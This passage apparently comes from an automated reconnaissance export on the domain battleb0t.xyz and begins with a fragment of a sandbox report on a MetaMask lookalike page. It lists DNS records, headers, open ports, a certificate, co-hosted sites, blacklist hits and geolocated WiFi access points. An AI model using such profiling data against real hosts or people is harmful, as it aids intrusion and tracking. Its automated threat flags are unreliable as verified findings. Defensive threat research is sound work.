u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"cdn.embedly.com"\n "d3e54v103j8qbb.cloudfront.net"\n "fonts.googleapis.com"\n "fonts.gstatic.com"\n "forms.hsforms.com"\n "googleads.g.doubleclick.net"\n "i.ytimg.com"\n "jnn-pa.googleapis.com"\n "metamask.io"\n "metamask3.cc"\n "perf.hsforms.com"\n "s4.cnzz.com"\n "static.doubleclick.net"\n "www.gstatic.com"\n "www.youtube.com"\n "yt3.ggpht.com"'}, {u'category': u'General', u'origin': u'File/Memory', u'identifier': u'string-10', u'name': u'Found a reference to a known community page', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 7, u'threat_level': 0, u'type': 2, u'description': u'file/memory contains long string with (Indicator: "dir "; File: "www-widgetapi_1_.js")\n Found string "qk.prototype.remove=function(a){this.g&&this.g.remove(a);var b=this.h;be.remove(""+a,"/",void 0===b?"youtube.com":b)};var rk=function(){var a;return function(){a||(a=new qk("ytidb"));return a}}();" (Indicator: "dir "; File: "www-widgetapi_1_.js")\n Found string ""undefined"!=typeof YTConfig&&YTConfig.parsetags&&"onload"!=YTConfig.parsetags||Fp();var qq=z.onYTReady;qq&&qq();var rq=z.onYouTubeIframeAPIReady;rq&&rq();var sq=z.onYouTubePlayerAPIReady;sq&&sq();}).call(this);" (Indicator: "dir "; File: "www-widgetapi_1_.js")\n Found string "<meta content="MetaMask - A crypto wallet & gateway to blockchain apps" property="twitter:title">" (Indicator: "dir "; File: "5IBMEWA7.htm")\n Found string "<meta content="A crypto wallet & gateway to blockchain apps" property="twitter:description">" (Indicator: "dir "; File: "5IBMEWA7.htm")\n Found string "<meta content="https://uploads-ssl.webflow.com/5b479ea1731aa13135a70342/5e6010110671f79d5c96adf9_open%20graph.png" property="twitter:image">" (Indicator: "dir "; File: "5IBMEWA7.htm")'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as 
clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "Explore-illo_1_.svg" as clean (type is "SVG Scalable Vector Graphics image")\n Antivirus vendors marked dropped file "wallet-illo_1_.svg" as clean (type is "SVG Scalable Vector Graphics image")\n Antivirus vendors marked dropped file "Browse-illo_1_.svg" as clean (type is "SVG Scalable Vector Graphics image")\n Antivirus vendors marked dropped file "mm-logo_1_.svg" as clean (type is "SVG Scalable Vector Graphics image")\n Antivirus vendors marked dropped file "mm-close-black_1_.svg" as clean (type is "SVG Scalable Vector Graphics image")\n Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")\n Antivirus vendors marked dropped file "Tar1FE2.tmp" as clean (type is "data")\n Antivirus vendors marked dropped file "Tar1FB1.tmp" as clean (type is "data")'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-56', u'name': u'Drops files with image extension', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 0, u'threat_level': 0, u'type': 8, u'description': u'"hero2.2_1_.png" has type "PNG image data 1752 x 1452 8-bit/color RGBA non-interlaced" and extension "png"\n "mm-shop-hoodie_1_.png" has type "PNG image data 786 x 786 8-bit/color RGBA non-interlaced" and extension "png"\n "maxresdefault_1_.jpg" has type "JPEG image data JFIF standard 1.01 aspect ratio density 1x1 segment length 16 baseline precision 8 1280x720 components 3" and extension "jpg"\n "dapp-axieinfinity_1_.png" has type "PNG image data 560 x 560 8-bit/color RGBA non-interlaced" and extension "png"\n "dapp-aave_1_.png" has type "PNG image data 560 x 560 8-bit/color RGBA non-interlaced" and extension "png"\n 
"dapp-compound_1_.png" has type "Unknown" and extension "png"\n "dapp-uniswap_1_.png" has type "Unknown" and extension "png"\n "dapp-gitcoin_1_.png" has type "Unknown" and extension "png"\n "dapp-maker_1_.png" has type "Unknown" and extension "png"\n "dapp-rarible_1_.png" has type "Unknown" and extension "png"\n "dapp-opensea_1_.png" has type "Unknown" and extension "png"\n "unnamed_1_.jpg" has type "Unknown" and extension "jpg"'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-5', u'name': u'Drops cabinet archive files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'"Cab1FB0.tmp" has type "Microsoft Cabinet archive data Windows 2000/XP setup 63843 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"- Location: [%TEMP%\\Cab1FB0.tmp]- [targetUID: 00000000-00000852]\n "Cab1FE1.tmp" has type "Microsoft Cabinet archive data Windows 2000/XP setup 63843 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"- Location: [%TEMP%\\Cab1FE1.tmp]- [targetUID: 00000000-00000852]'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"Explore-illo_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "wallet-illo_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "Browse-illo_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "mm-logo_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "mm-close-black_1_.svg" has type "SVG Scalable Vector Graphics image"- 
[targetUID: N/A]\n "social-35_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "urlblockindex_1_.bin" has type "data"- [targetUID: N/A]\n "base_1_.js" has type "ASCII text with very long lines"- [targetUID: N/A]\n "hero2.2_1_.png" has type "PNG image data 1752 x 1452 8-bit/color RGBA non-interlaced"- [targetUID: N/A]\n "v2_1_.js" has type "UTF-8 Unicode text with very l |
| 2023-05-12 03:01:15 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.134): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 03:12:10 | Affiliate Description - Category | No | DuckDuckGo | 0 | 0 | 5 | 0 | None | DShield , Cybercrime analytics. | baffin.netcraft.com |
| 2023-05-12 02:54:38 | HTTP Headers | No | Censys | 0 | 0 | 3 | 0 | None | {"_encoding": {"Referrer_Policy": "DISPLAY_UTF8", "Expires": "DISPLAY_UTF8", "Vary": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Cf_Ray": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8", "X_Frame_Options": "DISPLAY_UTF8", "Cache_Control": "DISPLAY_UTF8"}, "Referrer_Policy": ["same-origin"], "Expires": ["Thu, 01 Jan 1970 00:00:01 GMT"], "Vary": ["Accept-Encoding"], "Server": ["cloudflare"], "Cf_Ray": ["7c5ad421cd00112e-ORD"], "Connection": ["close"], "Content_Type": ["text/html; charset=UTF-8"], "Date": ["<REDACTED>"], "X_Frame_Options": ["SAMEORIGIN"], "Cache_Control": ["private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0"]} | 172.67.168.252 |
| 2023-05-12 03:01:24 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.236): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 03:00:49 | Co-Hosted Site | No | HackerTarget | 2 | 0 | 2 | 0 | None | 0-to-1.github.io | 185.199.111.153 |
| 2023-05-12 03:03:32 | Co-Hosted Site - Domain Name | No | DNS Resolver | 0 | 0 | 3 | 0 | None | github.io | 007sair.github.io |
| 2023-05-12 02:44:17 | Co-Hosted Site | No | SSL Certificate Analyzer | 0 | 0 | 2 | 0 | None | githubusercontent.com | 185.199.111.153 |
| 2023-05-12 03:01:22 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.204): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 03:19:01 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | ZyXEL (Net ID: 00:02:CF:98:55:20) | 40.2024, 29.0398 |
| 2023-05-12 02:56:15 | Non-Standard HTTP Header | No | Strange Header Identifier | 0 | 0 | 3 | 0 | None | x-nf-request-id: 01H06Y2Y8V02FJ2S9V869KY74K | {"content-length": "1200", "content-encoding": "gzip", "accept-ranges": "bytes", "strict-transport-security": "max-age=31536000", "vary": "Accept-Encoding", "server": "Netlify", "etag": "\"10b11d9bef9ac1c17b1885f92638df3c-ssl-df\"", "cache-control": "public, max-age=0, must-revalidate", "date": "Fri, 12 May 2023 02:53:07 GMT", "x-nf-request-id": "01H06Y2Y8V02FJ2S9V869KY74K", "content-type": "text/html; charset=UTF-8", "age": "73"} |
| 2023-05-12 02:44:22 | Internet Name | No | DNS Resolver | 0 | 0 | 2 | 0 | None | fluid.battleb0t.xyz | CN=fluid.battleb0t.xyz |
| 2023-05-12 03:23:29 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 188.114.96.10:443 | 188.114.96.0/24 |
| 2023-05-12 03:03:36 | Co-Hosted Site - Domain Name | No | DNS Resolver | 0 | 0 | 3 | 0 | None | github.io | 00saadchaudhry.github.io |
| 2023-05-12 02:54:48 | HTTP Headers | No | Censys | 0 | 0 | 3 | 0 | None | {"Date": ["<REDACTED>"], "_encoding": {"Date": "DISPLAY_UTF8", "Content_Length": "DISPLAY_UTF8", "X_Nf_Request_Id": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8"}, "Content_Length": ["0"], "X_Nf_Request_Id": ["01H06G1PB5R3RGDWCWXWQ2TAMN"], "Server": ["Netlify"]} | 34.148.97.127 |
| 2023-05-12 03:19:09 | Account on External Site | No | Account Finder | 0 | 0 | 6 | 0 | None | moxfield (Category: misc)
https://www.moxfield.com/users/login | login |
| 2023-05-12 02:56:15 | Non-Standard HTTP Header | No | Strange Header Identifier | 0 | 0 | 5 | 0 | None | x-nf-request-id: 01H06Y2WPKRCCC7SJ49ZB68B31 | {"content-length": "243", "accept-ranges": "bytes", "strict-transport-security": "max-age=31536000", "server": "Netlify", "etag": "\"c575cbc28e14cae03836d1d0fc69c052-ssl\"", "cache-control": "public, max-age=0, must-revalidate", "date": "Fri, 12 May 2023 02:54:18 GMT", "x-nf-request-id": "01H06Y2WPKRCCC7SJ49ZB68B31", "content-type": "text/css; charset=UTF-8", "age": "0"} |
| 2023-05-12 03:19:01 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | ASG (Net ID: 00:12:BF:FD:D5:8D) | 40.2024, 29.0398 |
| 2023-05-12 02:46:53 | Internet Name | No | DNS Resolver | 0 | 0 | 2 | 0 | None | vscode.battleb0t.xyz | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
03:89:fe:30:65:f6:62:86:64:4f:34:07:5e:a0:a9:be:d2:24
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Dec 13 15:55:50 2022 GMT
Not After : Mar 13 15:55:49 2023 GMT
Subject: CN=vscode.battleb0t.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (4096 bit)
Modulus:
00:b5:70:98:56:04:62:cd:9d:91:8b:97:7d:1f:67:
df:fd:40:4a:9e:a1:91:56:27:b2:c2:dc:db:18:7e:
90:b1:64:8c:6c:fd:2c:13:2d:ed:56:f7:36:ce:08:
2a:4a:36:14:30:02:df:d6:0f:d4:6c:7a:48:c9:01:
c5:bb:35:51:b6:01:95:98:7e:7b:4e:66:e0:84:62:
5a:92:58:14:ee:5f:0c:a5:3c:c0:6e:d5:a8:57:bb:
5b:46:82:bd:d9:28:fb:d9:2e:3c:cc:45:f6:41:c3:
2e:de:7e:83:17:a8:54:29:45:21:09:97:4c:fd:ed:
49:50:3b:81:1e:21:32:31:1d:79:ca:01:4a:ed:57:
fb:ff:6e:4d:44:22:c0:1f:54:2a:4f:e7:63:84:83:
2d:a4:25:2d:2e:38:54:17:99:ab:10:e9:5b:8e:64:
39:42:16:09:1d:92:05:aa:12:42:2e:33:56:a8:cb:
fa:cc:fe:15:09:1e:32:19:c2:f5:b5:fb:c3:50:cf:
4f:6c:46:9f:4a:26:a1:f6:b4:2c:c4:b6:e7:cf:c8:
0d:46:d3:02:56:c6:06:76:a6:5d:74:73:25:8a:74:
76:91:9c:94:b2:8b:47:bc:85:62:1a:aa:eb:32:0b:
97:18:b1:e4:f7:a7:1d:6d:50:4d:60:e9:30:d9:24:
3b:77:00:5c:86:fe:be:60:06:dd:41:13:db:73:e0:
c7:a6:69:d8:87:8d:f3:d9:19:43:f8:26:44:9c:46:
67:0b:09:0b:9b:db:37:73:fe:d3:c4:35:3e:63:88:
04:bf:f1:31:5f:68:76:f4:78:92:74:5e:90:26:85:
91:b2:c5:89:7c:e7:fd:90:5c:fb:08:d7:ec:7e:80:
bb:0c:21:cf:d6:c2:40:71:78:96:82:d9:32:54:0f:
4d:96:8c:31:42:ff:aa:a0:84:60:76:09:ee:ce:f1:
29:2b:47:e4:6d:53:c1:f3:6f:e1:43:b1:b5:0b:95:
35:33:7b:67:7a:23:ed:15:76:d9:5e:2f:96:95:57:
e5:56:fa:b4:14:d2:53:87:b2:95:ae:4a:c1:23:a4:
44:71:bc:56:67:dd:1d:18:ac:3b:6c:70:1c:35:da:
1c:0d:c0:ed:48:c3:e4:31:1a:74:9f:07:d7:d2:a2:
66:5e:12:e5:58:f2:5f:0c:2a:db:70:d9:e5:73:16:
75:7c:43:25:43:03:62:18:4f:72:50:53:b3:8a:1a:
b1:9c:46:ec:4a:d2:cb:cc:b8:7b:e9:84:cb:e1:b2:
ab:6c:e1:58:25:e1:54:f1:50:6c:98:68:55:60:cd:
f6:ef:3e:df:e4:c2:e3:11:66:4c:2d:50:b9:ef:ad:
19:0b:a7
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
C4:B4:9F:3E:13:AF:1E:ED:5D:1E:C0:B3:15:A8:37:84:5F:58:79:25
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:vscode.battleb0t.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate Poison: critical
NULL
Signature Algorithm: sha256WithRSAEncryption
af:0d:aa:ca:e8:49:20:45:87:cd:d5:1a:54:b2:f3:2b:99:ab:
ae:23:1b:aa:7c:93:d6:0a:57:f8:3f:18:87:31:b9:b4:a0:14:
5a:a3:d7:53:87:49:cc:95:a4:8e:e1:e6:0d:d2:49:89:d0:ab:
31:4a:f6:af:d0:2e:c0:e4:ff:51:6e:cc:42:b1:be:91:7a:44:
1f:34:8a:46:85:68:1e:0e:8a:4d:5e:89:38:d9:54:dc:c4:97:
4b:14:0d:a0:bf:8e:67:b1:f3:85:7e:a2:d3:2c:92:11:5d:ef:
0c:b6:b8:b4:a8:a0:28:c2:c4:e0:0b:b4:93:68:16:12:66:23:
a8:cb:69:a2:bf:1b:22:89:b2:38:bf:df:0d:9e:a1:33:e4:c9:
04:e1:b2:4a:cf:89:24:fc:25:18:33:fc:77:fd:48:86:24:59:
3a:69:44:1d:b2:6f:d2:51:7d:c9:04:e6:d5:a5:b1:f4:cb:92:
e0:9c:0c:cd:c9:a8:1e:1c:c1:a2:77:25:27:2b:d2:9b:00:84:
3f:ea:0e:96:98:b0:aa:91:b8:e1:7d:b2:c3:5e:b2:b9:e1:e4:
fe:26:7c:88:e1:94:ef:f3:1c:16:18:18:f0:eb:aa:97:f4:f5:
93:c9:a9:54:86:73:1d:9c:a1:3a:aa:11:c3:31:83:14:d1:61:
dc:56:91:9e
|
| 2023-05-12 02:54:27 | Open TCP Port | No | Censys | 0 | 0 | 4 | 0 | None | 2600:1f18:2489:8202::c8:443 | 2600:1f18:2489:8202::c8 |
| 2023-05-12 02:46:16 | Affiliate Description - Category | No | DuckDuckGo | 0 | 0 | 3 | 0 | None | Collaborative intelligence - Collaborative intelligence characterizes multi-agent, distributed systems where each agent, human or machine, is autonomously contributing to a problem solving network. Collaborative autonomy of organisms in their ecosystems makes evolution possible. | battleb0t.github.io |
| 2023-05-12 03:18:54 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | FUNK (Net ID: 00:02:2D:3A:A7:7B) | 50.1188, 8.6843 |
| 2023-05-12 03:18:53 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | fantastik (Net ID: 00:06:25:BE:90:75) | 39.0469, -77.4903 |
| 2023-05-12 02:54:18 | Linked URL - Internal | No | Web Spider | 1 | 0 | 3 | 0 | None | https://pics.battleb0t.xyz/images/withat_1.jpg | https://pics.battleb0t.xyz/ |
| 2023-05-12 03:01:44 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.228): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 02:54:10 | Raw Data from RIRs | No | Censys | 0 | 0 | 2 | 0 | None | {"last_updated_at": "2023-05-11T19:39:54.906Z", "ip": "2606:4700:3031::6815:6a6", "location_updated_at": "2023-05-07T07:37:11.063836Z", "autonomous_system_updated_at": "2023-05-07T07:37:11.064003Z", "location": {"province": "Illinois", "city": "Rosemont", "country": "United States", "coordinates": {"latitude": 41.99531, "longitude": -87.88451}, "postal_code": "60018", "country_code": "US", "timezone": "America/Chicago", "continent": "North America"}, "dns": {"records": {"faculdade.kennedy.br": {"record_type": "AAAA", "resolved_at": "2023-05-05T12:38:49.993145868Z"}, "resultscaraccidentlawyers.info": {"record_type": "AAAA", "resolved_at": "2023-04-24T17:51:50.273083754Z"}, "mail.atlas-media.net": {"record_type": "AAAA", "resolved_at": "2023-05-11T18:53:21.824413141Z"}, "www.magulike.com": {"record_type": "CNAME", "resolved_at": "2023-05-03T20:37:49.019589614Z"}, "unbeatableteams.com": {"record_type": "AAAA", "resolved_at": "2023-05-11T16:19:06.771575554Z"}, "ronnebytorget.se": {"record_type": "AAAA", "resolved_at": "2023-04-13T20:13:15.262547330Z"}, "homesayofficial.com": {"record_type": "AAAA", "resolved_at": "2023-05-08T14:59:56.576817191Z"}, "mail.diegobruno.com.br": {"record_type": "AAAA", "resolved_at": "2023-05-09T12:33:24.557695019Z"}, "2bn.dev": {"record_type": "AAAA", "resolved_at": "2023-04-18T16:34:18.007165816Z"}, "cdn-3.madeincanadadirectory.ca.cdn.cloudflare.net": {"record_type": "AAAA", "resolved_at": "2023-05-01T00:33:24.889964115Z"}, "www.detroitabortioncenter.com": {"record_type": "AAAA", "resolved_at": "2023-05-10T14:18:13.771625214Z"}, "olypay.com": {"record_type": "AAAA", "resolved_at": "2023-04-13T00:46:10.231275663Z"}, "4wdinfo.com": {"record_type": "AAAA", "resolved_at": "2023-05-10T13:06:50.126601945Z"}, "www.plus-fm.es": {"record_type": "CNAME", "resolved_at": "2023-05-09T17:04:29.567246924Z"}, "cdn-2.madeincanadadirectory.ca.cdn.cloudflare.net": 
{"record_type": "AAAA", "resolved_at": "2023-05-01T00:33:24.840354602Z"}, "dhff3aa.fit": {"record_type": "AAAA", "resolved_at": "2022-10-21T14:23:24.018557130Z"}, "theucontgi.tk": {"record_type": "AAAA", "resolved_at": "2023-04-23T21:28:34.547869491Z"}, "rockspitmarsliga.tk": {"record_type": "AAAA", "resolved_at": "2023-05-09T21:26:55.555920792Z"}, "nakedvampire.com": {"record_type": "AAAA", "resolved_at": "2023-04-06T15:40:27.395207080Z"}, "www.arquiteturasustentavel.arq.br.cdn.cloudflare.net": {"record_type": "AAAA", "resolved_at": "2022-09-25T17:06:29.959927232Z"}, "atlantic-hearing.com": {"record_type": "AAAA", "resolved_at": "2023-05-11T13:58:40.953790783Z"}, "mispditbobe.tk": {"record_type": "AAAA", "resolved_at": "2023-05-08T22:29:10.107963353Z"}, "www.progettatimobili.net.br": {"record_type": "AAAA", "resolved_at": "2023-03-26T12:54:52.310136130Z"}, "profmarpdust.gq": {"record_type": "AAAA", "resolved_at": "2023-04-19T19:40:52.408802267Z"}, "alexandrubadiu.ro": {"record_type": "AAAA", "resolved_at": "2023-05-05T20:03:40.049773053Z"}, "patconsidine.com": {"record_type": "AAAA", "resolved_at": "2023-05-01T15:09:59.045459058Z"}, "liftux.com": {"record_type": "AAAA", "resolved_at": "2023-04-30T14:56:52.096682674Z"}, "www.anizm.tv": {"record_type": "AAAA", "resolved_at": "2023-05-01T20:49:32.910799070Z"}, "hessenjazz.de": {"record_type": "AAAA", "resolved_at": "2023-04-04T17:07:11.850443808Z"}, "itallolik.gq": {"record_type": "AAAA", "resolved_at": "2023-05-09T17:19:14.126442672Z"}, "www.magulike.com.cdn.cloudflare.net": {"record_type": "AAAA", "resolved_at": "2023-05-01T00:33:30.641844587Z"}, "best-overall.com": {"record_type": "AAAA", "resolved_at": "2023-04-12T23:41:47.446630780Z"}, "ppm.amikom.id": {"record_type": "AAAA", "resolved_at": "2022-11-29T14:52:50.795015812Z"}, "naturisme-robertanne.fr": {"record_type": "AAAA", "resolved_at": "2023-04-30T22:46:36.240542292Z"}, "centreonicinga.wwbn.com": {"record_type": "AAAA", "resolved_at": 
"2023-05-07T16:18:28.593025009Z"}, "voyrabapbo.tk": {"record_type": "AAAA", "resolved_at": "2023-05-08T22:30:30.625066762Z"}, "www.seribusenyum.org": {"record_type": "AAAA", "resolved_at": "2023-02-04T17:32:21.980568714Z"}, "myschoolpoint.ca": {"record_type": "AAAA", "resolved_at": "2023-05-06T12:57:35.437078256Z"}, "camlovers.org": {"record_type": "AAAA", "resolved_at": "2023-05-04T21:36:27.672632585Z"}, "www.proappsys.com": {"record_type": "CNAME", "resolved_at": "2023-05-04T15:48:48.652972292Z"}, "beatroulettestrategy.net": {"record_type": "AAAA", "resolved_at": "2023-05-09T18:46:48.783088104Z"}, "www.palaciorentacar.com": {"record_type": "AAAA", "resolved_at": "2023-04-30T20:48:31.555576583Z"}, "gymnasie-portal.dk": {"record_type": "AAAA", "resolved_at": "2023-05-08T17:28:07.281800383Z"}, "celtabetgirisdestek.com": {"record_type": "AAAA", "resolved_at": "2023-04-28T14:41:36.658675345Z"}, "kmit17.com": {"record_type": "AAAA", "resolved_at": "2023-01-29T13:41:58.275178074Z"}, "congeohryverre.tk": {"record_type": "AAAA", "resolved_at": "2023-05-10T20:50:17.495400280Z"}, "oradfoy.tk": {"record_type": "AAAA", "resolved_at": "2023-04-18T21:32:57.447114952Z"}, "tja.shadialabadi.com": {"record_type": "AAAA", "resolved_at": "2023-05-03T15:32:40.048891469Z"}, "www.fopprey.com": {"record_type": "AAAA", "resolved_at": "2022-11-11T13:13:15.748303827Z"}, "bouncev2.precisiongroup.com.au": {"record_type": "AAAA", "resolved_at": "2023-05-08T12:27:03.617492048Z"}, "crabcamkanawi.ml": {"record_type": "AAAA", "resolved_at": "2023-04-29T18:29:51.293879545Z"}, "xn--kkkenvgte-l3a6q.dk": {"record_type": "AAAA", "resolved_at": "2023-04-24T17:07:19.955735049Z"}, "shop.geminibio.com": {"record_type": "AAAA", "resolved_at": "2023-05-10T14:29:06.617280204Z"}, "riostitelos.ga": {"record_type": "AAAA", "resolved_at": "2023-04-25T17:42:06.424778601Z"}, "www.typearound.com": {"record_type": "AAAA", "resolved_at": "2023-05-03T15:59:44.822944002Z"}, "topcard.com.pl": {"record_type": "AAAA", 
"resolved_at": "2023-05-04T21:48:11.468590186Z"}, "www.comeunity.club": {"record_type": "AAAA", "resolved_at": "2023-04-20T16:30:09.585410651Z"}, "longchampcolombia.com": {"record_type": "AAAA", "resolved_at": "2023-04-25T15:13:12.725728600Z"}, "rezidenceaurum.cz": {"record_type": "AAAA", "resolved_at": "2023-03-11T15:26:42.690547113Z"}, "webdisk.cncap.ca": {"record_type": "AAAA", "resolved_at": "2023-05-01T12:42:56.064120059Z"}, "cpcalendars.menuin.pe": {"record_type": "AAAA", "resolved_at": "2023-03-16T07:00:36.539543312Z"}, "ftp.jogjacontemporary.net": {"record_type": "AAAA", "resolved_at": "2023-05-10T19:05:42.498201439Z"}, "cg.cncap.ca": {"record_type": "AAAA", "resolved_at": "2023-04-29T12:44:12.255784234Z"}, "growthwithsystem.be": {"record_type": "AAAA", "resolved_at": "2022-10-31T12:14:11.983652539Z"}, "newdangbrogerti.ga": {"record_type": "AAAA", "resolved_at": "2023-04-18T17:06:00.041619303Z"}, "newtravail2022.net": {"record_type": "AAAA", "resolved_at": "2022-10-18T16:41:02.524986626Z"}, "hdhub4u.city": {"record_type": "AAAA", "resolved_at": "2023-05-08T13:06:34.661665843Z"}, "kozan.com.br": {"record_type": "AAAA", "resolved_at": "2023-05-10T12:33:17.879735441Z"}, "observatoriodevino.com": {"record_type": "AAAA", "resolved_at": "2022-10-03T13:56:38.631534190Z"}, "cpanel.vertexhc.com": {"record_type": "AAAA", "resolved_at": "2023-05-03T16:02:17.928893946Z"}, "ok-medicalbilling-ok.live": {"record_type": "AAAA", "resolved_at": "2023-05-01T17:47:16.990114377Z"}, "pwrcdn.net": {"record_type": "AAAA", "resolved_at": "2023-04-07T05:41:18.589594638Z"}, "cpcalendars.diegobruno.com.br": {"record_type": "AAAA", "resolved_at": "2023-05-06T12:35:36.066684702Z"}, "datenschlauch.de": {"record_type": "AAAA", "resolved_at": "2023-05-02T23:34:28.039399648Z"}, "bouncefitness.precisiongroup.com.au": {"record_type": "AAAA", "resolved_at": "2023-02-21T12:15:56.351172926Z"}, "login.sanopoly.com": {"record_type": "AAAA", "resolved_at": "2023-04-22T00:18:08.415048164Z"}, 
"ymfasti.gq": {"record_type": "AAAA", "resolved_at": "2023-04-19T19:41:20.884654729Z"}, "typearound.com": {"record_type": "AAAA", "resolved_at": "2023-04-24T16:14:46.070651001Z"}, "romacerah.org": {"record_type": "AAAA", "resolved_at": "2023-05-01T02:19:33.400343679Z"}, "assets.2bn.dev": {"record_type": "AAAA", "resolved_at": "2023-04-09T16:19:12.101330472Z"}, "www.seminare-steinbergerhof.com": {"record_type": "AAAA", "resolved_at": "2022-11-05T14:24:46.885115354Z"}, "mail.hlb.co.za": {"record_type": "AAAA", "resolved_at": "2023-04-26T22:59:18.792128403Z"}, "www.cg.cncap.ca": {"record_type": "AAAA", "resolved_at": "2023-04-21T12:55:12.348140033Z"}, "www.meeturplanet.com": {"record_type": "AAAA", "resolved_at": "2023-05-04T15:22:12.227518637Z"}, "beta-site.rotacapital.net": {"record_type": "AAAA", "resolved_at": "2022-12-25T16:14:07.247668745Z"}, "xelxican.cf": {"record_type": "AAAA", "resolved_at": "2022-10-22T12:32:56.395415126Z"}, "oliveandspicecroatia.com": {"record_type": "AAAA", "resolved_at": "2023-04-29T15:31:59.293869948Z"}, "erkilgalegohlo.cf": {"record_type": "AAAA", "resolved_at": "2022-12-22T12:29:44.995025840Z"}, "kerzcoobamabasvio.cf": {"record_type": "AAAA", "resolved_at": "2023-05-07T12:50:31.337450458Z"}, "centraldeviviendas.es": {"record_type": "AAAA", "resolved_at": "2023-04-30T22:34:28.683222668Z"}, "anernearode.ga": {"record_type": "AAAA", "resolved_at": "2023-04-23T17:20:15.209953535Z"}, "www.invertsport.com.cdn.cloudflare.net": {"record_type": "AAAA", "resolved_at": "2022-10-25T15:57:28.766154138Z"}, "myneonglow.com": {"record_type": "AAAA", "resolved_at": "2023-05-07T15:10:52.426252771Z"}, "fowenthotatecsu.tk": {"record_type": "AAAA", "resolved_at": "2023-04-24T22:20:29.238762448Z"}, "www.thedot.cn.cdn.cloudflare.net": {"record_type": "AAAA", "resolved_at": "2023-05-05T18:22:25.417735752Z"}, "mynutrition365.com": {"record_type": "AAAA", "resolved_at": "2023-01-28T13:41:29.917096426Z"}, "www.sexytie.com": {"record_type": "AAAA", 
"resolved_at": "2023-05-03T15:32:31.959854869Z"}, "comprafcesssuptitog.ga": {"record_type": "AAAA", "resolved_at": "2023-05-11T17:33:53.554671898Z"}, "www.brianelstonlaw.com": {"record_type": "AAAA", "resolved_at": "2023-04-24T14:13:06.005656367Z"}, "kola-jen.com": {"record_type": "AAAA", "resolved_at": "2022-12-01T13:36:32.553804192Z"}}, "names": ["www.magulike.com.cdn.cloudflare.net | 2606:4700:3031::6815:6a6 |
| 2023-05-12 03:09:50 | Affiliate - Internet Name | No | DNS Resolver | 0 | 0 | 4 | 0 | None | 84.170.74.34.bc.googleusercontent.com | 34.74.170.84 |
| 2023-05-12 02:55:05 | Open TCP Port Banner | No | Censys | 0 | 0 | 2 | 0 | None | HTTP/1.1 403 Forbidden
Server: cloudflare
Date: <REDACTED>
Content-Type: text/html
Content-Length: 151
